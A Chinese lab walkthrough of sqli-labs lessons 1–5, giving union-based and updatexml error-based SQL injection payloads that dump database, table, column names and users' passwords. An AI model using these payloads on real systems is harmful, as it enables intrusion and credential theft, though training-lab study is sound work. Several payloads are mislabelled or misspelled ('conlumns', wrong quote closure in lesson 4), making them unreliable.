page1-less1-22

第一关

发现是有回显的，且传入的参数是通过'1'包裹的，所以我们的payload，如下

测试列数

?id=1' order by 3 --+ //超过第一条语句的查询列数会报错，小于或等于不会报错

测试回显点

?id=-1' union select 1,2,3 --+ //union 联合查询一般来说只会回显第一条语句的结果，所以我们要让第一条语句查不到值，我们这里是用的-1确保联合查询的语句有效

爆库

?id=-1' union select 1,database(),3 --+

爆表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

表列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where%20 table_schema='security' and table_name='users' --+

爆数据

?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

第二关

与第一关的区别在于id参数是数字型，没有任何闭合用?id=1 (sql语句) --+可通关

第三关

与第一关的区别在于id参数是用（''）闭合的，用?id=1‘） (sql语句) --+可通关

第四关

与第一关的区别在于id参数是用（" "）闭合的，用?id=1‘） (sql语句) --+可通关

第五关

发现查询结果是没有反馈的，我们可以用报错查询我们这里使用的是updatexml（可以爆出的字节数有限）

爆库

?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

爆表

?id=1' and updatexml(1,concat(0x7e,(select distinct group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

爆库

?id=1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e,group_concat(columns_name),0x7e) from information_schema.conlumns where table_schema= 'security' and table_name='users'),0x7e),1)--+

手机扫一扫

移动阅读更方便

你可能感兴趣的文章

INotifyPropertyChanged接口的实现

mongoDB 学习笔记纯干货（mongoose、增删改查、聚合、索引、连接、备份与恢复、监控等等）

maxwell数据抓取工具

oracle 验证流水存在性火箭试优化

oracle-组合索引字段位置与查询效率之间的关系

Java使用redis-Redis是并发安全的吗？

提高 Web 开发效率的10个VS Code扩展插件，你知道吗？

数据库安装postgresql

如何使用Java + React计算个人所得税？

SpringBoot获取树状结构数据-SQL处理